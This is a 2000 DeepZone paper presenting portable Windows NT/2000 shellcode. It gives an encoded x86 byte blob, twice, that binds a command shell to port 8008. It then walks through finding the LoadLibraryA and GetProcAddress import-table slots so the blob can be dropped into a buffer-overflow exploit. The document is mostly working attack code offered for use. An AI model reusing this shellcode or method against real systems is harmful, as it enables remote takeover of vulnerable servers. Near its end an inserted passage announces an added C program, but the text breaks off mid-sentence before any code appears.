	___________________________________________________________________


		       (c) 2000 DeepZone. All rights reserved.

		     _-=[ plug&play WinNT/2k remote shellcode ]=-_

                              by |Zan <izan@deepzone.org>

		http://www.deepzone.org - http://mareasvivas.cjb.net

	___________________________________________________________________


	
	Background
	__________

	The number of overflows being published for Windows NT is
	turning into a real problem for administrators running
	WinNT/2k networks.

	Since it became possible to exploit this kind of vulnerability
	with some reliability, many people report new b0fs and attach
	to their advisories some sort of code that presupposes
	addresses, files and, in short, an environment that need not
	exist on a real remote system.

	The real problem starts if that code were actually portable,
	something any hacker could drop into an exploit quickly and
	comfortably ...


	Introduction
	____________

	This text will not go over the principle of overwriting the
	stack and taking control of program flow that lies behind a
	classic stack overflow.

	There are plenty of resources on the net and suitable
	literature for understanding that, or for reading up on a
	specific point. In any case, at the end of this document you
	will find the most widely circulated papers on stack
	overflows and the theory behind them [1].

	The next two sections of this document present a portable
	shellcode for WinNT/2k that binds a console to port 8008, and
	show how to integrate it into a generic exploit.


	plug&play shellcode
	___________________

	; -- begin x86/asm --

        ; Placeholders for the two IAT slot addresses, one byte each,
        ; stored XOR 99h like the rest of the blob. LLB = LoadLibraryA
        ; slot, GPB = GetProcAddress slot; xB4 is the low byte and xB1
        ; the high byte (little-endian). Fill them in per target; all
        ; zero here, which encodes to 99h.
        LLB1    equ     (00h xor 99h)
        LLB2    equ     (00h xor 99h)
        LLB3    equ     (00h xor 99h)
        LLB4    equ     (00h xor 99h)

        GPB1    equ     (00h xor 99h)
        GPB2    equ     (00h xor 99h)
        GPB3    equ     (00h xor 99h)
        GPB4    equ     (00h xor 99h)

	DeepZone_w32ShellCode:
	db 068h, 05eh, 056h, 0c3h, 090h, 054h, 059h, 0ffh, 0d1h
	db 058h, 033h, 0c9h, 0b1h, 01ch, 090h, 090h, 090h, 090h
	db 003h, 0f1h, 056h, 05fh, 033h, 0c9h, 066h, 0b9h, 095h
	db 004h, 090h, 090h, 090h, 0ach, 034h, 099h, 0aah, 0e2h
	db 0fah, 071h, 099h, 099h, 099h, 099h, 0c4h, 018h, 074h
	db 040h, 0b8h, 0d9h, 099h, 014h, 02ch, 06bh, 0bdh, 0d9h
	db 099h, 014h, 024h, 063h, 0bdh, 0d9h, 099h, 0f3h, 09eh
	db 009h, 009h, 009h, 009h, 0c0h, 071h, 04bh, 09bh, 099h
	db 099h, 014h, 02ch, 0b3h, 0bch, 0d9h, 099h, 014h, 024h
	db 0aah, 0bch, 0d9h, 099h, 0f3h, 093h, 009h, 009h, 009h
	db 009h, 0c0h, 071h, 023h, 09bh, 099h, 099h, 0f3h, 099h
	db 014h, 02ch, 040h, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch
	db 07ch, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch, 070h, 0bch
	db 0d9h, 099h, 0cfh, 066h, 00ch, 0aah, 0bch, 0d9h, 099h
	db 0f3h, 099h, 014h, 02ch, 040h, 0bch, 0d9h, 099h, 0cfh
	db 014h, 02ch, 074h, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch
	db 068h, 0bch, 0d9h, 099h, 0cfh, 066h, 00ch, 0aah, 0bch
	db 0d9h, 099h, 05eh, 01ch, 06ch, 0bch, 0d9h, 099h, 0ddh
	db 099h, 099h, 099h, 014h, 02ch, 06ch, 0bch, 0d9h, 099h
	db 0cfh, 066h, 00ch, 0aeh, 0bch, 0d9h, 099h, 014h, 02ch
	db 0b4h, 0bfh, 0d9h, 099h, 034h, 0c9h, 066h, 00ch, 0cah
	db 0bch, 0d9h, 099h, 014h, 02ch, 0a8h, 0bfh, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0cah, 0bch, 0d9h, 099h, 014h
	db 02ch, 068h, 0bch, 0d9h, 099h, 014h, 024h, 0b4h, 0bfh
	db 0d9h, 099h, 03ch, 014h, 02ch, 07ch, 0bch, 0d9h, 099h
	db 034h, 014h, 024h, 0a8h, 0bfh, 0d9h, 099h, 032h, 014h
	db 024h, 0ach, 0bfh, 0d9h, 099h, 032h, 05eh, 01ch, 0bch
	db 0bfh, 0d9h, 099h, 099h, 099h, 099h, 099h, 05eh, 01ch
	db 0b8h, 0bfh, 0d9h, 099h, 098h, 098h, 099h, 099h, 014h
	db 02ch, 0a0h, 0bfh, 0d9h, 099h, 0cfh, 014h, 02ch, 06ch
	db 0bch, 0d9h, 099h, 0cfh, 0f3h, 099h, 0f3h, 099h, 0f3h
	db 089h, 0f3h, 098h, 0f3h, 099h, 0f3h, 099h, 014h, 02ch
	db 0d0h, 0bfh, 0d9h, 099h, 0cfh, 0f3h, 099h, 066h, 00ch
	db 0a2h, 0bch, 0d9h, 099h, 0f1h, 099h, 0b9h, 099h, 099h
	db 009h, 0f1h, 099h, 09bh, 099h, 099h, 066h, 00ch, 0dah
	db 0bch, 0d9h, 099h, 010h, 01ch, 0c8h, 0bfh, 0d9h, 099h
	db 0aah, 059h, 0c9h, 0d9h, 0c9h, 0d9h, 0c9h, 066h, 00ch
	db 063h, 0bdh, 0d9h, 099h, 0c9h, 0c2h, 0f3h, 089h, 014h
	db 02ch, 050h, 0bch, 0d9h, 099h, 0cfh, 0cah, 066h, 00ch
	db 067h, 0bdh, 0d9h, 099h, 0f3h, 09ah, 0cah, 066h, 00ch
	db 09bh, 0bch, 0d9h, 099h, 014h, 02ch, 0cch, 0bfh, 0d9h
	db 099h, 0cfh, 014h, 02ch, 050h, 0bch, 0d9h, 099h, 0cfh
	db 0cah, 066h, 00ch, 09fh, 0bch, 0d9h, 099h, 014h, 024h
	db 0c0h, 0bfh, 0d9h, 099h, 032h, 0aah, 059h, 0c9h, 014h
	db 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0c9h, 0c9h, 0c9h
	db 014h, 02ch, 070h, 0bch, 0d9h, 099h, 034h, 0c9h, 066h
	db 00ch, 0a6h, 0bch, 0d9h, 099h, 0f3h, 0a9h, 066h, 00ch
	db 0d6h, 0bch, 0d9h, 099h, 072h, 0d4h, 009h, 009h, 009h
	db 0aah, 059h, 0c9h, 014h, 024h, 0fch, 0bfh, 0d9h, 099h
	db 0ceh, 0c9h, 0c9h, 0c9h, 014h, 02ch, 070h, 0bch, 0d9h
	db 099h, 034h, 0c9h, 066h, 00ch, 0a6h, 0bch, 0d9h, 099h
	db 0f3h, 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 01ah
	db 024h, 0fch, 0bfh, 0d9h, 099h, 09bh, 096h, 01bh, 08eh
	db 098h, 099h, 099h, 018h, 024h, 0fch, 0bfh, 0d9h, 099h
	db 098h, 0b9h, 099h, 099h, 0ebh, 097h, 009h, 009h, 009h
	db 009h, 05eh, 01ch, 0fch, 0bfh, 0d9h, 099h, 099h, 0b9h
	db 099h, 099h, 0f3h, 099h, 012h, 01ch, 0fch, 0bfh, 0d9h
	db 099h, 014h, 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0c9h
	db 012h, 01ch, 0c8h, 0bfh, 0d9h, 099h, 0c9h, 014h, 02ch
	db 070h, 0bch, 0d9h, 099h, 034h, 0c9h, 066h, 00ch, 0deh
	db 0bch, 0d9h, 099h, 0f3h, 0a9h, 066h, 00ch, 0d6h, 0bch
	db 0d9h, 099h, 012h, 01ch, 0fch, 0bfh, 0d9h, 099h, 0f3h
	db 099h, 0c9h, 014h, 02ch, 0c8h, 0bfh, 0d9h, 099h, 034h
	db 0c9h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h, 034h, 0c9h
	db 066h, 00ch, 093h, 0bch, 0d9h, 099h, 0f3h, 099h, 014h
	db 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0f3h, 099h, 0f3h
	db 099h, 0f3h, 099h, 014h, 02ch, 070h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0a6h, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 0aah, 050h
	db 0a0h, 014h, 0fch, 0bfh, 0d9h, 099h, 096h, 01eh, 0feh
	db 066h, 066h, 066h, 0f3h, 099h, 0f1h, 099h, 0b9h, 099h
	db 099h, 009h, 014h, 02ch, 0c8h, 0bfh, 0d9h, 099h, 034h
	db 0c9h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h, 034h, 0c9h
	db 066h, 00ch, 097h, 0bch, 0d9h, 099h, 010h, 01ch, 0f8h
	db 0bfh, 0d9h, 099h, 0f3h, 099h, 014h, 024h, 0fch, 0bfh
	db 0d9h, 099h, 0ceh, 0c9h, 014h, 02ch, 0c8h, 0bfh, 0d9h
	db 099h, 034h, 0c9h, 014h, 02ch, 074h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0d2h, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 0f3h, 099h
	db 012h, 01ch, 0f8h, 0bfh, 0d9h, 099h, 014h, 024h, 0fch
	db 0bfh, 0d9h, 099h, 0ceh, 0c9h, 012h, 01ch, 0c8h, 0bfh
	db 0d9h, 099h, 0c9h, 014h, 02ch, 070h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0deh, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 070h, 020h
	db 067h, 066h, 066h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 08bh, 0bch, 0d9h, 099h, 014h
	db 02ch, 0c4h, 0bfh, 0d9h, 099h, 034h, 0c9h, 066h, 00ch
	db 08bh, 0bch, 0d9h, 099h, 0f3h, 099h, 066h, 00ch, 0ceh
	db 0bch, 0d9h, 099h, 0c8h, 0cfh, 0f1h, LLB4, LLB3, LLB2
	db LLB1, 009h, 0c3h, 066h, 08bh, 0c9h, 0c2h, 0c0h, 0ceh
	db 0c7h, 0c8h, 0cfh, 0cah, 0f1h, GPB4, GPB3, GPB2, GPB1
	db 009h, 0c3h, 066h, 08bh, 0c9h, 035h, 01dh, 059h, 0ech
	db 062h, 0c1h, 032h, 0c0h, 07bh, 070h, 05ah, 0ceh, 0cah
	db 0d6h, 0dah, 0d2h, 0aah, 0abh, 099h, 0eah, 0f6h, 0fah
	db 0f2h, 0fch, 0edh, 099h, 0fbh, 0f0h, 0f7h, 0fdh, 099h
	db 0f5h, 0f0h, 0eah, 0edh, 0fch, 0f7h, 099h, 0f8h, 0fah
	db 0fah, 0fch, 0e9h, 0edh, 099h, 0eah, 0fch, 0f7h, 0fdh
	db 099h, 0ebh, 0fch, 0fah, 0efh, 099h, 0fah, 0f5h, 0f6h
	db 0eah, 0fch, 0eah, 0f6h, 0fah, 0f2h, 0fch, 0edh, 099h
	db 0d2h, 0dch, 0cbh, 0d7h, 0dch, 0d5h, 0aah, 0abh, 099h
	db 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0f0h, 0e9h
	db 0fch, 099h, 0deh, 0fch, 0edh, 0cah, 0edh, 0f8h, 0ebh
	db 0edh, 0ech, 0e9h, 0d0h, 0f7h, 0ffh, 0f6h, 0d8h, 099h
	db 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0ebh, 0f6h
	db 0fah, 0fch, 0eah, 0eah, 0d8h, 099h, 0c9h, 0fch, 0fch
	db 0f2h, 0d7h, 0f8h, 0f4h, 0fch, 0fdh, 0c9h, 0f0h, 0e9h
	db 0fch, 099h, 0deh, 0f5h, 0f6h, 0fbh, 0f8h, 0f5h, 0d8h
	db 0f5h, 0f5h, 0f6h, 0fah, 099h, 0cbh, 0fch, 0f8h, 0fdh
	db 0dfh, 0f0h, 0f5h, 0fch, 099h, 0ceh, 0ebh, 0f0h, 0edh
	db 0fch, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cah, 0f5h, 0fch
	db 0fch, 0e9h, 099h, 0dah, 0f5h, 0f6h, 0eah, 0fch, 0d1h
	db 0f8h, 0f7h, 0fdh, 0f5h, 0fch, 099h, 0dch, 0e1h, 0f0h
	db 0edh, 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 099h
	db 0dah, 0f6h, 0fdh, 0fch, 0fdh, 0b9h, 0fbh, 0e0h, 0b9h
	db 0e5h, 0c3h, 0f8h, 0f7h, 0b9h, 0a5h, 0f0h, 0e3h, 0f8h
	db 0f7h, 0d9h, 0fdh, 0fch, 0fch, 0e9h, 0e3h, 0f6h, 0f7h
	db 0fch, 0b7h, 0f6h, 0ebh, 0feh, 0a7h, 09bh, 099h, 086h
	db 0d1h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 095h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 098h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 0dah
	db 0d4h, 0ddh, 0b7h, 0dch, 0c1h, 0dch, 099h, 099h, 099h
	db 099h, 099h, 089h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 090h, 090h, 090h, 090h, 090h

	; -- end x86/asm --


	howto ?
	_______

	The code above was designed to work from just two API
	addresses that are present in 99% of Windows executables:
	GetProcAddress and LoadLibraryA.

	These two addresses are constant for a given executable (they
	change with every build of the binary, so they are tied to a
	specific version of the target service), so we can treat them
	as known when we build a remote b0f and use them to abuse the
	remote server.

	Strictly speaking, the two addresses are not the APIs
	themselves but the import table (IAT) slots the executable is
	linked against: the program jumps indirectly through them to
	the real absolute addresses of GetProcAddress and
	LoadLibraryA.

	Both are easy to obtain with a debugger or by disassembling
	the code.

	Let's look at the following listing as an example ...


	; Tasm 5.0/x86

	.386p
	locals
	jumps
	.model flat, stdcall

	extrn LoadLibraryA:PROC
	extrn GetProcAddress:PROC
        extrn WSAStartup:PROC


	.data

        wsadescription_len equ 256
        wsasys_status_len equ 128

        ; WSADATA as defined by winsock.h; lpVendorInfo is a far
        ; pointer, so it is a dword, not a word (with dw the struct
        ; is too short and WSAStartup overwrites the string below)
        WSAdata struct
                wVersion       dw ?
                wHighVersion   dw ?
                szDescription  db wsadescription_len+1 dup (?)
                szSystemStatus db wsasys_status_len+1  dup (?)
                iMaxSockets    dw ?
                iMaxUdpDg      dw ?
                lpVendorInfo   dd ?
        WSAdata ends
        wsadata WSAdata <?>

	__strKERNEL32		db	'KERNEL32', 0
	__strExitProcess	db	'ExitProcess', 0
	
	; -- begin x86/asm --

        ; IAT slots of this test binary, filled in: 00403050 for
        ; LoadLibraryA and 00403054 for GetProcAddress, low byte in
        ; xB4, high byte in xB1, every byte XOR 99h
        LLB1    equ     (00h xor 99h)
        LLB2    equ     (40h xor 99h)
        LLB3    equ     (30h xor 99h)
        LLB4    equ     (50h xor 99h)

        GPB1    equ     (00h xor 99h)
        GPB2    equ     (40h xor 99h)
        GPB3    equ     (30h xor 99h)
        GPB4    equ     (54h xor 99h)

	DeepZone_w32ShellCode:
	db 068h, 05eh, 056h, 0c3h, 090h, 054h, 059h, 0ffh, 0d1h
	db 058h, 033h, 0c9h, 0b1h, 01ch, 090h, 090h, 090h, 090h
	db 003h, 0f1h, 056h, 05fh, 033h, 0c9h, 066h, 0b9h, 095h
	db 004h, 090h, 090h, 090h, 0ach, 034h, 099h, 0aah, 0e2h
	db 0fah, 071h, 099h, 099h, 099h, 099h, 0c4h, 018h, 074h
	db 040h, 0b8h, 0d9h, 099h, 014h, 02ch, 06bh, 0bdh, 0d9h
	db 099h, 014h, 024h, 063h, 0bdh, 0d9h, 099h, 0f3h, 09eh
	db 009h, 009h, 009h, 009h, 0c0h, 071h, 04bh, 09bh, 099h
	db 099h, 014h, 02ch, 0b3h, 0bch, 0d9h, 099h, 014h, 024h
	db 0aah, 0bch, 0d9h, 099h, 0f3h, 093h, 009h, 009h, 009h
	db 009h, 0c0h, 071h, 023h, 09bh, 099h, 099h, 0f3h, 099h
	db 014h, 02ch, 040h, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch
	db 07ch, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch, 070h, 0bch
	db 0d9h, 099h, 0cfh, 066h, 00ch, 0aah, 0bch, 0d9h, 099h
	db 0f3h, 099h, 014h, 02ch, 040h, 0bch, 0d9h, 099h, 0cfh
	db 014h, 02ch, 074h, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch
	db 068h, 0bch, 0d9h, 099h, 0cfh, 066h, 00ch, 0aah, 0bch
	db 0d9h, 099h, 05eh, 01ch, 06ch, 0bch, 0d9h, 099h, 0ddh
	db 099h, 099h, 099h, 014h, 02ch, 06ch, 0bch, 0d9h, 099h
	db 0cfh, 066h, 00ch, 0aeh, 0bch, 0d9h, 099h, 014h, 02ch
	db 0b4h, 0bfh, 0d9h, 099h, 034h, 0c9h, 066h, 00ch, 0cah
	db 0bch, 0d9h, 099h, 014h, 02ch, 0a8h, 0bfh, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0cah, 0bch, 0d9h, 099h, 014h
	db 02ch, 068h, 0bch, 0d9h, 099h, 014h, 024h, 0b4h, 0bfh
	db 0d9h, 099h, 03ch, 014h, 02ch, 07ch, 0bch, 0d9h, 099h
	db 034h, 014h, 024h, 0a8h, 0bfh, 0d9h, 099h, 032h, 014h
	db 024h, 0ach, 0bfh, 0d9h, 099h, 032h, 05eh, 01ch, 0bch
	db 0bfh, 0d9h, 099h, 099h, 099h, 099h, 099h, 05eh, 01ch
	db 0b8h, 0bfh, 0d9h, 099h, 098h, 098h, 099h, 099h, 014h
	db 02ch, 0a0h, 0bfh, 0d9h, 099h, 0cfh, 014h, 02ch, 06ch
	db 0bch, 0d9h, 099h, 0cfh, 0f3h, 099h, 0f3h, 099h, 0f3h
	db 089h, 0f3h, 098h, 0f3h, 099h, 0f3h, 099h, 014h, 02ch
	db 0d0h, 0bfh, 0d9h, 099h, 0cfh, 0f3h, 099h, 066h, 00ch
	db 0a2h, 0bch, 0d9h, 099h, 0f1h, 099h, 0b9h, 099h, 099h
	db 009h, 0f1h, 099h, 09bh, 099h, 099h, 066h, 00ch, 0dah
	db 0bch, 0d9h, 099h, 010h, 01ch, 0c8h, 0bfh, 0d9h, 099h
	db 0aah, 059h, 0c9h, 0d9h, 0c9h, 0d9h, 0c9h, 066h, 00ch
	db 063h, 0bdh, 0d9h, 099h, 0c9h, 0c2h, 0f3h, 089h, 014h
	db 02ch, 050h, 0bch, 0d9h, 099h, 0cfh, 0cah, 066h, 00ch
	db 067h, 0bdh, 0d9h, 099h, 0f3h, 09ah, 0cah, 066h, 00ch
	db 09bh, 0bch, 0d9h, 099h, 014h, 02ch, 0cch, 0bfh, 0d9h
	db 099h, 0cfh, 014h, 02ch, 050h, 0bch, 0d9h, 099h, 0cfh
	db 0cah, 066h, 00ch, 09fh, 0bch, 0d9h, 099h, 014h, 024h
	db 0c0h, 0bfh, 0d9h, 099h, 032h, 0aah, 059h, 0c9h, 014h
	db 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0c9h, 0c9h, 0c9h
	db 014h, 02ch, 070h, 0bch, 0d9h, 099h, 034h, 0c9h, 066h
	db 00ch, 0a6h, 0bch, 0d9h, 099h, 0f3h, 0a9h, 066h, 00ch
	db 0d6h, 0bch, 0d9h, 099h, 072h, 0d4h, 009h, 009h, 009h
	db 0aah, 059h, 0c9h, 014h, 024h, 0fch, 0bfh, 0d9h, 099h
	db 0ceh, 0c9h, 0c9h, 0c9h, 014h, 02ch, 070h, 0bch, 0d9h
	db 099h, 034h, 0c9h, 066h, 00ch, 0a6h, 0bch, 0d9h, 099h
	db 0f3h, 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 01ah
	db 024h, 0fch, 0bfh, 0d9h, 099h, 09bh, 096h, 01bh, 08eh
	db 098h, 099h, 099h, 018h, 024h, 0fch, 0bfh, 0d9h, 099h
	db 098h, 0b9h, 099h, 099h, 0ebh, 097h, 009h, 009h, 009h
	db 009h, 05eh, 01ch, 0fch, 0bfh, 0d9h, 099h, 099h, 0b9h
	db 099h, 099h, 0f3h, 099h, 012h, 01ch, 0fch, 0bfh, 0d9h
	db 099h, 014h, 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0c9h
	db 012h, 01ch, 0c8h, 0bfh, 0d9h, 099h, 0c9h, 014h, 02ch
	db 070h, 0bch, 0d9h, 099h, 034h, 0c9h, 066h, 00ch, 0deh
	db 0bch, 0d9h, 099h, 0f3h, 0a9h, 066h, 00ch, 0d6h, 0bch
	db 0d9h, 099h, 012h, 01ch, 0fch, 0bfh, 0d9h, 099h, 0f3h
	db 099h, 0c9h, 014h, 02ch, 0c8h, 0bfh, 0d9h, 099h, 034h
	db 0c9h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h, 034h, 0c9h
	db 066h, 00ch, 093h, 0bch, 0d9h, 099h, 0f3h, 099h, 014h
	db 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0f3h, 099h, 0f3h
	db 099h, 0f3h, 099h, 014h, 02ch, 070h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0a6h, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 0aah, 050h
	db 0a0h, 014h, 0fch, 0bfh, 0d9h, 099h, 096h, 01eh, 0feh
	db 066h, 066h, 066h, 0f3h, 099h, 0f1h, 099h, 0b9h, 099h
	db 099h, 009h, 014h, 02ch, 0c8h, 0bfh, 0d9h, 099h, 034h
	db 0c9h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h, 034h, 0c9h
	db 066h, 00ch, 097h, 0bch, 0d9h, 099h, 010h, 01ch, 0f8h
	db 0bfh, 0d9h, 099h, 0f3h, 099h, 014h, 024h, 0fch, 0bfh
	db 0d9h, 099h, 0ceh, 0c9h, 014h, 02ch, 0c8h, 0bfh, 0d9h
	db 099h, 034h, 0c9h, 014h, 02ch, 074h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0d2h, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 0f3h, 099h
	db 012h, 01ch, 0f8h, 0bfh, 0d9h, 099h, 014h, 024h, 0fch
	db 0bfh, 0d9h, 099h, 0ceh, 0c9h, 012h, 01ch, 0c8h, 0bfh
	db 0d9h, 099h, 0c9h, 014h, 02ch, 070h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0deh, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 070h, 020h
	db 067h, 066h, 066h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 08bh, 0bch, 0d9h, 099h, 014h
	db 02ch, 0c4h, 0bfh, 0d9h, 099h, 034h, 0c9h, 066h, 00ch
	db 08bh, 0bch, 0d9h, 099h, 0f3h, 099h, 066h, 00ch, 0ceh
	db 0bch, 0d9h, 099h, 0c8h, 0cfh, 0f1h, LLB4, LLB3, LLB2
	db LLB1, 009h, 0c3h, 066h, 08bh, 0c9h, 0c2h, 0c0h, 0ceh
	db 0c7h, 0c8h, 0cfh, 0cah, 0f1h, GPB4, GPB3, GPB2, GPB1
	db 009h, 0c3h, 066h, 08bh, 0c9h, 035h, 01dh, 059h, 0ech
	db 062h, 0c1h, 032h, 0c0h, 07bh, 070h, 05ah, 0ceh, 0cah
	db 0d6h, 0dah, 0d2h, 0aah, 0abh, 099h, 0eah, 0f6h, 0fah
	db 0f2h, 0fch, 0edh, 099h, 0fbh, 0f0h, 0f7h, 0fdh, 099h
	db 0f5h, 0f0h, 0eah, 0edh, 0fch, 0f7h, 099h, 0f8h, 0fah
	db 0fah, 0fch, 0e9h, 0edh, 099h, 0eah, 0fch, 0f7h, 0fdh
	db 099h, 0ebh, 0fch, 0fah, 0efh, 099h, 0fah, 0f5h, 0f6h
	db 0eah, 0fch, 0eah, 0f6h, 0fah, 0f2h, 0fch, 0edh, 099h
	db 0d2h, 0dch, 0cbh, 0d7h, 0dch, 0d5h, 0aah, 0abh, 099h
	db 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0f0h, 0e9h
	db 0fch, 099h, 0deh, 0fch, 0edh, 0cah, 0edh, 0f8h, 0ebh
	db 0edh, 0ech, 0e9h, 0d0h, 0f7h, 0ffh, 0f6h, 0d8h, 099h
	db 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0ebh, 0f6h
	db 0fah, 0fch, 0eah, 0eah, 0d8h, 099h, 0c9h, 0fch, 0fch
	db 0f2h, 0d7h, 0f8h, 0f4h, 0fch, 0fdh, 0c9h, 0f0h, 0e9h
	db 0fch, 099h, 0deh, 0f5h, 0f6h, 0fbh, 0f8h, 0f5h, 0d8h
	db 0f5h, 0f5h, 0f6h, 0fah, 099h, 0cbh, 0fch, 0f8h, 0fdh
	db 0dfh, 0f0h, 0f5h, 0fch, 099h, 0ceh, 0ebh, 0f0h, 0edh
	db 0fch, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cah, 0f5h, 0fch
	db 0fch, 0e9h, 099h, 0dah, 0f5h, 0f6h, 0eah, 0fch, 0d1h
	db 0f8h, 0f7h, 0fdh, 0f5h, 0fch, 099h, 0dch, 0e1h, 0f0h
	db 0edh, 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 099h
	db 0dah, 0f6h, 0fdh, 0fch, 0fdh, 0b9h, 0fbh, 0e0h, 0b9h
	db 0e5h, 0c3h, 0f8h, 0f7h, 0b9h, 0a5h, 0f0h, 0e3h, 0f8h
	db 0f7h, 0d9h, 0fdh, 0fch, 0fch, 0e9h, 0e3h, 0f6h, 0f7h
	db 0fch, 0b7h, 0f6h, 0ebh, 0feh, 0a7h, 09bh, 099h, 086h
	db 0d1h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 095h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 098h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 0dah
	db 0d4h, 0ddh, 0b7h, 0dch, 0c1h, 0dch, 099h, 099h, 099h
	db 099h, 099h, 089h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 090h, 090h, 090h, 090h, 090h

	; -- end x86/asm --
	

	.code

	start:

		push    offset wsadata
		push    0101h
		call    WSAStartup		; WinSock 1.1 init (a real target has already done this)

                jmp     DeepZone_w32ShellCode	; hijack the flow: stands in for the overwritten return address

		push	offset	__strKERNEL32
		call	LoadLibraryA
		push	offset	__strExitProcess
		push	eax
                call    GetProcAddress
		push	0
		call	eax			; ExitProcess(0), only reached if the jmp is removed

	end start


	The code above dynamically obtains the address of ExitProcess
	and terminates with a return value of 0, ignoring the
	shellcode, if the unconditional jump is not executed.

	If the unconditional jump is executed, the shellcode takes
	control.

	WinSock initialisation was included in the first three lines
	because, on the remote server where the b0f would be
	triggered, WinSock has already been initialised by the time
	the b0f happens, and the shellcode does not need to initialise
	it again. Note what that implies: the blob loads WSOCK32
	through LoadLibraryA and resolves socket, bind, listen,
	accept, send, recv and closesocket with GetProcAddress, but it
	never calls WSAStartup, so it relies on the host process
	having done so.

	If we inspect the code carefully we will see that the calls to
	the LoadLibraryA and GetProcAddress APIs go through an
	indirect jump ...

	LoadLibraryA     ----->   jmp dword ptr [00403050]
	GetProcAddress   ----->   jmp dword ptr [00403054]

	The addresses we are looking for are ...

	00403050 for LoadLibraryA and 00403054 for GetProcAddress
	(ImageBase 00400000 plus the RVA of each IAT slot; the
	decoded shellcode uses them as push 00403050h / pop edx /
	call [edx]).
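	Finding those two slots without a debugger, as an added example
	that is not part of the original text or of DeepZone's code: the
	C program below parses the import directory of a PE32 image and
	reports the IAT slot address (ImageBase + FirstThunk + 4*i) for
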